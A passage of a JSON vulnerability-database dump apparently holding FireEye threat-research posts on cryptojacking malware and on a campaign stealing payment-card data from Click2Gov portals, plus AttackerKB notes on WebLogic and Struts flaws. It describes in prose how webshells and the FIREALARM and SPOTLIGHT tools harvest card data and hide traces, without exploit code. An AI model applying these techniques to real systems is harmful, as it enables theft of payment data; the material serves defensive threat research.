Cryptocurrency mining operations significantly benefit from this functionality since wider distribution of the malware multiplies the amount of CPU resources available to them for mining. Consequently, we expect that additional actors will continue to develop this capability.\n\nThe following are some real-world examples of cryptojacking worms:\n\n * In May 2017, [Proofpoint reported](<https://www.proofpoint.com/us/threat-insight/post/adylkuzz-cryptocurrency-mining-malware-spreading-for-weeks-via-eternalblue-doublepulsar>) a large campaign distributing mining malware \"Adylkuzz.\" This cryptocurrency miner was observed leveraging the EternalBlue exploit to rapidly spread itself over corporate LANs and wireless networks. This activity included the use of the DoublePulsar backdoor to download Adylkuzz. Adylkuzz infections create botnets of Windows computers that focus on mining Monero.\n * Security researchers with [Sensors identified](<https://sensorstechforum.com/w32-rarogminer-monero-miner-worm-lsass-exe-remove/>) a Monero miner worm, dubbed \"Rarogminer,\" in April 2018 that would copy itself to removable drives each time a user inserted a flash drive or external HDD.\n * In January 2018, [researchers at F5](<https://f5.com/labs/articles/threat-intelligence/malware/new-python-based-crypto-miner-botnet-flying-under-the-radar>) discovered a new Monero cryptomining botnet that targets Linux machines. PyCryptoMiner is based on Python script and spreads via the SSH protocol. The bot can also use Pastebin for its command and control (C2) infrastructure. The malware spreads by trying to guess the SSH login credentials of target Linux systems. Once that is achieved, the bot deploys a simple base64-encoded Python script that connects to the C2 server to download and execute more malicious Python code.\n\n#### Detection Avoidance Methods\n\nAnother trend worth noting is the use of proxies to avoid detection. 
The implementation of mining proxies presents an attractive option for cyber criminals because it allows them to avoid developer and commission fees of 30 percent or more. Avoiding the use of common cryptojacking services such as Coinhive, Cryptloot, and Deepminer, and instead hosting cryptojacking scripts on actor-controlled infrastructure, can circumvent many of the common strategies taken to block this activity via domain or file name blacklisting.\n\nIn March 2018, [Bleeping Computer reported](<https://www.bleepingcomputer.com/news/security/in-browser-cryptojacking-is-getting-harder-to-detect/>) on the use of cryptojacking proxy servers and determined that as the use of cryptojacking proxy services increases, the effectiveness of ad blockers and browser extensions that rely on blacklists decreases significantly.\n\nSeveral mining proxy tools can be found on GitHub, such as the [XMRig Proxy](<https://github.com/xmrig/xmrig-proxy>) tool, which greatly reduces the number of active pool connections, and the [CoinHive Stratum Mining Proxy](<https://github.com/x25/coinhive-stratum-mining-proxy>), which uses Coinhive\u2019s JavaScript mining library to provide an alternative to using official Coinhive scripts and infrastructure.\n\nIn addition to using proxies, actors may also establish their own self-hosted miner apps, either on private servers or cloud-based servers that support Node.js. Although private servers may provide some benefit over using a commercial mining service, they are still subject to easy blacklisting and require more operational effort to maintain. 
According to [Sucuri researchers](<https://blog.sucuri.net/2018/01/malicious-cryptominers-from-github-part-2.html>), cloud-based servers provide many benefits to actors looking to host their own mining applications, including:\n\n * Available free or at low-cost\n * No maintenance, just upload the crypto-miner app\n * Harder to block as blacklisting the host address could potentially impact access to legitimate services\n * Resilient to permanent takedown as new hosting accounts can more easily be created using disposable accounts\n\nThe combination of proxies and crypto-miners hosted on actor-controlled cloud infrastructure presents a significant hurdle to security professionals, as both make cryptojacking operations more difficult to detect and take down.\n\n#### Mining Victim Demographics\n\nBased on data from FireEye detection technologies, the detection of cryptocurrency miner malware has increased significantly since the beginning of 2018 (Figure 10), with the most popular mining pools being minergate and nanopool (Figure 11), and the most heavily affected country being the U.S. (Figure 12). 
Consistent with [other reporting](<https://www.bleepingcomputer.com/news/cryptocurrency/students-mining-cryptocurrencies-are-clogging-up-university-networks/>), the education sector remains most affected, likely due to more relaxed security controls across university networks and students taking advantage of free electricity to mine cryptocurrencies (Figure 13).\n\n \nFigure 10: Cryptocurrency miner detection activity per month\n\n \nFigure 11: Commonly observed pools and associated ports\n\n \nFigure 12: Top 10 affected countries\n\n \nFigure 13: Top five affected industries\n\n \nFigure 14: Top affected industries by country\n\n#### Mitigation Techniques\n\n##### Unencrypted Stratum Sessions\n\nAccording to security researchers at Cato Networks, in order for a miner to participate in pool mining, the infected machine will have to run native or JavaScript-based code that uses the Stratum protocol over TCP or HTTP/S. The Stratum protocol uses a publish/subscribe architecture where clients send subscription requests to join a pool and servers send messages (publish) to their subscribed clients. These messages are simple, readable, JSON-RPC messages. Subscription requests will include the following entities: id, method, and params (Figure 15). A deep packet inspection (DPI) engine can be configured to look for these parameters in order to block Stratum over unencrypted TCP.\n\n \nFigure 15: Stratum subscription request parameters\n\n##### Encrypted Stratum Sessions\n\nIn the case of JavaScript-based miners running Stratum over HTTPS, detection is more difficult for DPI engines that do not decrypt TLS traffic. To mitigate encrypted mining traffic on a network, organizations may blacklist the IP addresses and domains of popular mining pools. 
However, the downside to this is identifying and updating the blacklist, as locating a reliable and continually updated list of popular mining pools can prove difficult and time consuming.\n\n##### Browser-Based Sessions\n\nIdentifying and detecting websites that have embedded coin mining code can be difficult since not all coin mining scripts are authorized by website publishers (as in the case of a compromised website). Further, in cases where coin mining scripts were authorized by a website owner, they are not always clearly communicated to site visitors.\n\nAs defenses evolve to prevent unauthorized coin mining activities, so will the techniques used by actors; however, blocking some of the most common indicators that we have observed to date may be effective in combatting a significant amount of the CPU-draining mining activities that customers have reported. Generic detection strategies for browser-based cryptocurrency mining include:\n\n * Blocking domains known to have hosted coin mining scripts\n * Blocking websites of known mining project websites, such as Coinhive\n * Blocking scripts altogether\n * Using an ad-blocker or coin mining-specific browser add-ons\n * Detecting commonly used naming conventions\n * Alerting and blocking traffic destined for known popular mining pools\n\nSome of these detection strategies may also be of use in blocking some mining functionality included in existing financial malware as well as mining-specific malware families.\n\nIt is important to note that JavaScript used in browser-based cryptojacking activity cannot access files on disk. However, if a host has inadvertently navigated to a website hosting mining scripts, we recommend purging cache and other browser data.\n\n#### Outlook\n\nIn underground communities and marketplaces there has been significant interest in cryptojacking operations, and numerous campaigns have been observed and reported by security researchers. 
These developments demonstrate the continued upward trend of threat actors conducting cryptocurrency mining operations, and we expect this focus to continue throughout 2018. Notably, malicious cryptocurrency mining may be seen as preferable due to the perception that it does not attract as much attention from law enforcement as compared to other forms of fraud or theft. Further, victims may not realize their computer is infected beyond a slowdown in system performance.\n\nDue to its inherent privacy-focused features and CPU-mining profitability, Monero has become one of the most attractive cryptocurrency options for cyber criminals. We believe that it will continue to be threat actors' primary cryptocurrency of choice, so long as the Monero blockchain maintains privacy-focused standards and is ASIC-resistant. If in the future the Monero protocol ever downgrades its security and privacy-focused features, then we assess with high confidence that threat actors will move to use another privacy-focused coin as an alternative.\n\nBecause of the anonymity associated with the Monero cryptocurrency and electronic wallets, as well as the availability of numerous cryptocurrency exchanges and tumblers, attribution of malicious cryptocurrency mining is very challenging for authorities, and malicious actors behind such operations typically remain unidentified. 
Threat actors will undoubtedly continue to demonstrate high interest in malicious cryptomining so long as it remains profitable and relatively low risk.\n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "LOW", "vectorString": "CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2018-07-18T14:00:00", "type": "fireeye", "title": "How the Rise of Cryptocurrencies Is Shaping the Cyber Crime Landscape:\nThe Growth of Miners", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-0099", "CVE-2017-10271"], "modified": "2018-07-18T14:00:00", "id": "FIREEYE:42E1F284AEBD41C72EC6CD12CDCCD0A6", "href": "https://www.fireeye.com/blog/threat-research/2018/07/cryptocurrencies-cyber-crime-growth-of-miners.html", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2018-10-11T20:17:40", "description": "FireEye has been tracking a campaign this year targeting web payment portals that involves on-premise installations of Click2Gov. [Click2Gov](<https://www.superion.com/public-administration/click2gov/>) is a web-based, interactive self-service bill-pay software solution developed by Superion. 
It includes various modules that allow users to pay bills associated with various local government services such as utilities, building permits, and business licenses. In October 2017, Superion released a statement [confirming suspicious activity](<https://www.superion.com/ceo-response-to-reported-breach/>) had affected a small number of customers. In mid-June 2018, numerous media reports referenced at least seven Click2Gov customers that were possibly affected by this campaign. Since June 2018, additional victims have been identified in public reporting. A review of public statements by these organizations appears to confirm compromises associated with Click2Gov.\n\nOn June 15, 2018, Superion released a statement describing their [proactive notification to affected customers](<https://www.superion.com/click2gov-update/>), work with a third-party forensic firm (not Mandiant), and deployment of patches to Click2Gov software and a related third-party component. Superion then concluded that there was no evidence that it is unsafe to make payments utilizing Click2Gov on hosted or secure on-premise networks with recommended patches and configurations.\n\nMandiant forensically analyzed compromised systems and recovered malware associated with this campaign, which provided insight into the capabilities of this new attacker. As of this publication, the discussed malware families have very low detection rates by antivirus solutions, as reported by VirusTotal.\n\n#### Attack Overview\n\nThe first stage of the campaign typically started with the attacker uploading a SJavaWebManage webshell to facilitate interaction with the compromised Click2Gov webserver. Through interaction with the webshell, the attacker enabled debug mode in a Click2Gov configuration file, causing the application to write payment card information to plaintext log files. 
The attacker then uploaded a tool, which FireEye refers to as FIREALARM, to the webserver to parse these log files, retrieve the payment card information, and remove all log entries not containing error messages. Additionally, the attacker used another tool, SPOTLIGHT, to intercept payment card information from HTTP network traffic. The remainder of this blog post dives into the details of the attacker's tactics, techniques, and procedures (TTPs).\n\n#### SJavaWebManage Webshell\n\nIt is not known how the attacker compromised the Click2Gov webservers, but they likely employed an exploit targeting Oracle Web Logic such as CVE-2017-3248, CVE-2017-3506, or CVE-2017-10271, which would provide the capability to upload arbitrary files or achieve remote access. After exploiting the vulnerability, the attacker uploaded a variant of the [publicly available JavaServer Pages (JSP) webshell SJavaWebManage](<https://github.com/tennc/webshell/blob/master/jsp/SJavaWebManageV1.4.jsp>) to maintain persistence on the webserver. 
SJavaWebManage requires authentication to access four specific pages, as depicted in Figure 1, and will execute commands in the context of the Tomcat service, by default the Local System account.\n\n \nFigure 1: Sample SJavaWebManage interface\n\n * **EnvsInfo**: Displays information about the Java runtime, Tomcat version, and other information about the environment.\n * **FileManager**: Provides the ability to browse, upload, download (original or compressed), edit, delete, and timestomp files.\n * **CMDS**: Executes a command using cmd.exe (or /bin/sh if on a non-Windows system) and returns the response.\n * **DBManage**: Interacts with a database by connecting, displaying database metadata, and executing SQL commands.\n\nThe differences between the publicly available webshell and this variant include variable names that were changed to possibly inhibit detection, Chinese characters that were changed to English, references to SjavaWebManage that were deleted, and code to handle updates to the webshell being removed. Additionally, the variant identified during the campaign investigation included the ability to manipulate file timestamps on the server. This functionality is not present in the public version. The SJavaWebManage webshell provided the attacker a sufficient interface to easily interact with and manipulate the compromised hosts.\n\nThe attacker would then restart a module in DEBUG mode using the SJavaWebManage CMDS page after editing a Click2Gov XML configuration file. 
With the DEBUG logging option enabled, the Click2Gov module would log plaintext payment card data to the Click2Gov log files with naming convention Click2GovCX.logYYYY-MM-DD.\n\n#### FIREALARM\n\nUsing interactive commands within the webshell, the attacker uploaded and executed a datamining utility FireEye tracks as FIREALARM, which parses through Click2Gov log files to retrieve payment card data, format the data, and print it to the console.\n\nFIREALARM is a command line tool written in C/C++ that accepts three numbers as arguments; Year, Month, and Day, represented in a sample command line as: evil.exe 2018 09 01. From this example, FIREALARM would attempt to open and parse logs starting on 2018-09-01 until the present day. If a log file exists, FIREALARM copies the MAC (Modified, Accessed, Created) times to later timestomp the corresponding file back to original times. Each log file is then read line by line and parsed. FIREALARM searches each line for the following contents and parses the data:\n\n * medium.accountNumber\n * medium.cvv2\n * medium.expirationDate.year\n * medium.expirationDate.month\n * medium.firstName\n * medium.lastName\n * medium.middleInitial\n * medium.contact.address1\n * medium.contact.address2\n * medium.contact.city\n * medium.contact.state\n * medium.contact.zip.code\n\nThis data is formatted and printed to the console. The malware also searches for lines that contain the text ERROR -. If this string is found, the utility stores the contents in a temporary file named %WINDIR%\\temp\\THN1080.tmp. After searching every line in the Click2GovCX log file, the temporary file THN1080.tmp is copied to replace the respective Click2GovCX log file and the timestamps are replaced with the original, copied timestamps. The result is that FIREALARM prints payment card information to the console and removes the payment card data from each Click2GovCX log file, leaving only the error messages. Finally, the THN1080.tmp temporary file is deleted. 
This process is depicted in Figure 2.\n\n \nFigure 2: FIREALARM workflow\n\n 1. Attacker traverses Tor or other proxy and authenticates to SjavaWebManage.\n 2. Attacker launches cmd prompt via webshell.\n 3. Attacker runs FIREALARM with parameters.\n 4. FIREALARM verifies and iterates through log files, copies MAC times, parses and prints payment card data to the console, copies error messages to THN1080.tmp, overwrites the original log file and timestomps with original times.\n 5. THN1080.tmp is deleted.\n\n#### SPOTLIGHT\n\nLater, during attacker access to the compromised system, the attacker used the webshell to upload a network sniffer FireEye tracks as SPOTLIGHT. This tool offered the attacker better persistence to the host and continuous collection of payment card data, ensuring the mined data would not be lost if Click2GovCX log files were deleted by an administrator. SPOTLIGHT is also written in C/C++ and may be installed by command line arguments or run as a service. When run as a service, its tasks include ensuring that two JSP files exist, and monitoring and logging network traffic for specific HTTP POST request contents.\n\nSPOTLIGHT accepts two command line arguments:\n\n * gplcsvc.exe -i Creates a new service named gplcsvc with the display name Group Policy Service\n * gplcsvc.exe -u Stops and deletes the service named gplcsvc\n\nUpon installation, SPOTLIGHT will monitor two paths on the infected host every hour:\n\n 1. C:\\bea\\c2gdomain\\applications\\Click2GovCX\\scripts\\validator.jsp\n 2. C:\\bea\\c2gdomain\\applications\\ePortalLocalService\\axis2-web\\RightFrame.jsp\n\nIf either file does not exist, the malware Base64 decodes an embedded SJavaWebManage webshell and writes the same file to either path. This is the same webshell installed by the attacker during the initial compromise.\n\nAdditionally, SPOTLIGHT starts a socket listener to inspect IPv4 TCP traffic on ports 80 and 7101. 
According to a Superion installation checklist, TCP port 7101 is used for application resolution from the internal network to the Click2Gov webserver. As long as the connection contents do not begin with GET /, the malware begins saving a buffer of received packets. The malware continues saving packet contents to an internal buffer until one of two conditions occurs \u2013 the buffer exceeds the size 102399 or the packet contents begin with the string POST /OnePoint/services/OnePointService. If either of these two conditions occurs, the internal buffer data is searched for the following tags:\n\n * <op:AccountNum>\n * <op:CSC>\n * <op:ExpDate>\n * <op:FirstName>\n * <op:LastName>\n * <op:MInitial>\n * <op:Street1>\n * <op:Street2>\n * <op:City>\n * <op:State>\n * <op:PostalCode>\n\nThe contents between the tags are extracted and formatted with a `|`, which is used as a separator character. The formatted data is then Base64 encoded and appended to a log file at the hard-coded file path: c:\\windows\\temp\\opt.log. The attacker then used SJavaWebManage to exfiltrate the Base64 encoded log file containing payment card data. FireEye has not identified any manipulation of a compromised host\u2019s SSL configuration settings or redirection of SSL traffic to an unencrypted port. This process is depicted in Figure 3.\n\n \nFigure 3: SPOTLIGHT workflow\n\n 1. SPOTLIGHT verifies webshell file on an hourly basis, writing SJavaWebManage if missing.\n 2. SPOTLIGHT inspects IPv4 TCP traffic on port 80 or 7101, saving a buffer of received packets.\n 3. A user accesses Click2Gov module to make a payment.\n 4. SPOTLIGHT parses packets for payment card data, Base64 encodes and writes to opt.log.\n 5. Attacker traverses Tor or other proxy and authenticates to SJavaWebManage and launches File Manager.\n 6. 
Attacker exfiltrates opt.log file.\n\n#### Attribution\n\nBased on the available campaign information, the attacker doesn\u2019t align with any financially motivated threat groups currently tracked by FireEye. The attacker\u2019s understanding of the Click2Gov host requirements, process logging details, payment card fields, and internal communications protocols demonstrates an advanced knowledge of the Click2Gov application. Given the manner in which underground forums and marketplaces function, it is possible that tool development could have been contracted to third parties and remote access to compromised systems could have been achieved by one entity and sold to another. There is much left to be uncovered about this attacker. \n\nWhile it is also possible the attack was conducted by a single individual, FireEye assesses, with moderate confidence, that a team was likely involved in this campaign based on the following requisite skillsets:\n\n * Ability to locate Click2Gov installations and identify exploitable vulnerabilities.\n * Ability to craft or reuse an exploit to penetrate the target organization\u2019s network environment.\n * Basic JSP programming skills.\n * Advanced knowledge of Click2Gov payment processes and software sufficient to develop moderately sophisticated malware.\n * Proficient C/C++ programming skills.\n * General awareness of operational security.\n * Ability to monetize stolen payment card information.\n\n#### Conclusion\n\nIn addition to a regimented patch management program, FireEye recommends that organizations consider implementing a file integrity monitoring solution to monitor the static content and code that generates dynamic content on e-commerce webservers for unexpected modifications. 
Another best practice is to ensure any web service accounts run with least privilege.\n\nAlthough the TTPs observed in the attack lifecycle are generally consistent with other financially motivated attack groups tracked by FireEye, this attacker demonstrated ingenuity in crafting malware exploiting Click2Gov installations, achieving moderate success. Although it may transpire in a new form, FireEye anticipates this threat actor will continue to conduct interactive and financially motivated attacks.\n\n#### Detection\n\nFireEye\u2019s Adversary Pursuit Team from Technical Operations & Reverse Engineering \u2013 Advanced Practices works jointly with Mandiant Consulting and FireEye Labs Advanced Reverse Engineering (FLARE) during investigations assessed as directly supporting nation-state or financially motivated intrusions that target organizations and involve interactive and focused efforts. The synergy of this relationship allows FireEye to rapidly identify new activity associated with currently tracked threat groups, as well as new threat actors, advanced malware, or TTPs leveraged by threat groups, and quickly mitigate them across the FireEye enterprise.\n\nFireEye detects the malware documented in this blog post as the following:\n\n * FE_Tool_Win32_FIREALARM_1\n * FE_Trojan_Win64_SPOTLIGHT_1\n * FE_Webshell_JSP_SJavaWebManage_1\n * Webshell.JSP.SJavaWebManage\n\n#### Indicators of Compromise (MD5)\n\n_SJavaWebManage_\n\n * 91eaca79943c972cb2ca7ee0e462922c \n * 80f8a487314a9573ab7f9cb232ab1642 \n * cc155b8cd261a6ed33f264e710ce300e (Publicly available version)\n\n_FIREALARM_\n\n * e2c2d8bad36ac3e446797c485ce8b394\n\n_SPOTLIGHT_\n\n * d70068de37d39a7a01699c99cdb7fa2b\n * 1300d1f87b73d953e20e25fdf8373c85\n * 3bca4c659138e769157f49942824b61f\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", 
"integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2018-09-19T10:00:00", "type": "fireeye", "title": "Click It Up: Targeting Local Government Payment Portals", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-3506", "CVE-2017-3248", "CVE-2017-10271"], "modified": "2018-09-19T10:00:00", "id": "FIREEYE:C097B41677EDE5F95DB4B84AD6726751", "href": "https://www.fireeye.com/blog/threat-research/2018/09/click-it-up-targeting-local-government-payment-portals.html", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "attackerkb": [{"lastseen": "2023-06-07T15:11:19", "description": "Vulnerability in the Oracle WebLogic Server component of Oracle Fusion Middleware (subcomponent: WLS Security). Supported versions that are affected are 10.3.6.0.0, 12.1.3.0.0, 12.2.1.1.0 and 12.2.1.2.0. Easily exploitable vulnerability allows unauthenticated attacker with network access via T3 to compromise Oracle WebLogic Server. Successful attacks of this vulnerability can result in takeover of Oracle WebLogic Server. CVSS 3.0 Base Score 7.5 (Availability impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H).\n\n \n**Recent assessments:** \n \n**wchen-r7** at May 23, 2019 5:44pm UTC reported:\n\nStraightforward and reliable exploitation. No auth required. 
WebLogic is quite well known and it is also bundled in other products. Should be a pentester\u2019s favorite.\n\n**asoto-r7** at September 12, 2019 6:06pm UTC reported:\n\nStraightforward and reliable exploitation. No auth required. WebLogic is quite well known and it is also bundled in other products. Should be a pentester\u2019s favorite.\n\nAssessed Attacker Value: 5 \nAssessed Attacker Value: 5Assessed Attacker Value: 5\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2017-10-19T00:00:00", "type": "attackerkb", "title": "CVE-2017-10271 - Oracle WebLogic Server AsyncResponseService Deserialization Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-10271"], "modified": "2021-07-27T00:00:00", "id": "AKB:7992242A-E0F4-4572-BE13-859467611F09", "href": "https://attackerkb.com/topics/KjHcjsGuez/cve-2017-10271---oracle-weblogic-server-asyncresponseservice-deserialization-vulnerability", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2023-06-05T17:22:07", "description": "The Jakarta Multipart parser in Apache Struts 2 2.3.x before 2.3.32 and 2.5.x before 2.5.10.1 has incorrect 
exception handling and error-message generation during file-upload attempts, which allows remote attackers to execute arbitrary commands via a crafted Content-Type, Content-Disposition, or Content-Length HTTP header, as exploited in the wild in March 2017 with a Content-Type header containing a #cmd= string.\n\n \n**Recent assessments:** \n \n**wvu-r7** at September 03, 2020 4:29pm UTC reported:\n\nThis popped Equifax. Vulnerable versions of Struts are exploitable out of the box, since this was a parser flaw. Make sure this is patched!\n\n**hrbrmstr** at May 12, 2020 7:45pm UTC reported:\n\nThis popped Equifax. Vulnerable versions of Struts are exploitable out of the box, since this was a parser flaw. Make sure this is patched!\n\nAssessed Attacker Value: 5 \nAssessed Attacker Value: 5Assessed Attacker Value: 5\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2017-03-11T00:00:00", "type": "attackerkb", "title": "CVE-2017-5638", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-5638"], "modified": "2020-07-30T00:00:00", "id": "AKB:BDF59C15-D64F-45D5-B1AC-D1B9DD354080", "href": 
"https://attackerkb.com/topics/1MWtVe9P7w/cve-2017-5638", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-06-07T17:20:36", "description": "Vulnerability in the Oracle WebLogic Server component of Oracle Fusion Middleware (subcomponent: Web Services). Supported versions that are affected are 10.3.6.0.0 and 12.1.3.0.0. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise Oracle WebLogic Server. Successful attacks of this vulnerability can result in takeover of Oracle WebLogic Server. CVSS 3.0 Base Score 9.8 (Confidentiality, Integrity and Availability impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H).\n\n \n**Recent assessments:** \n \n**asoto-r7** at May 09, 2019 5:57pm UTC reported:\n\nCVE-2019-2725 (aka CNVD-C 2019-48814) exploits an XML deserialization vulnerability in Oracle WebLogic via the AsyncResponseService component. The exploit provides an unauthenticated attacker with remote arbitrary command execution.\n\nAccording to the vendor, Oracle WebLogic Server v10.3.6.0 and 12.1.3.0 are affected.\n\nIn addition to a public proof-of-concept, a Metasploit module has been published to allow for exploitation of Windows, Linux, and Unix hosts. 
It has been successfully tested on v10.3.6.0, and exploitation failed against 12.2.1.2.\n\nAssessed Attacker Value: 4 \nAssessed Attacker Value: 4Assessed Attacker Value: 4\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2019-04-26T00:00:00", "type": "attackerkb", "title": "CVE-2019-2725", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-2725"], "modified": "2021-07-22T00:00:00", "id": "AKB:9B4E2AEC-697D-42F0-9FED-B010FB1F82ED", "href": "https://attackerkb.com/topics/GmCoX0fF2M/cve-2019-2725", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-06-07T15:16:13", "description": "Apache Struts 2.0.0 to 2.5.20 forced double OGNL evaluation, when evaluated on raw user input in tag attributes, may lead to remote code execution.\n\n \n**Recent assessments:** \n \n**wvu-r7** at September 03, 2020 4:30pm UTC reported:\n\nUnlike [CVE-2017-5638](<https://attackerkb.com/topics/1MWtVe9P7w/cve-2017-5638>), which was exploitable out of the box, since it targeted Struts\u2019 Jakarta multipart parser, this vulnerability requires a certain set of circumstances to be true in 
order for Struts to be exploitable. Since Struts is a web application framework, this will depend entirely on the application the developers have created.\n\n**I don\u2019t know how common this particular scenario is.** Please read the [security bulletin](<https://cwiki.apache.org/confluence/display/WW/S2-059>) for more information. However, what I do know is that this CVE falls somewhere after [CVE-2017-5638](<https://attackerkb.com/topics/1MWtVe9P7w/cve-2017-5638>) and [CVE-2018-11776](<https://attackerkb.com/topics/jgIUjIdFUR/cve-2018-11776>) on the exploitability scale, from most exploitable to least: a parser flaw, a configuration flaw, and a programming flaw.\n\nSo, definitely patch this, but also follow Struts development best practices, including those outlined in their security bulletins. No measure of mitigations will protect you from poorly written code.\n\nAssessed Attacker Value: 5 \nAssessed Attacker Value: 5Assessed Attacker Value: 2\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2020-09-14T00:00:00", "type": "attackerkb", "title": "CVE-2019-0230", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": 
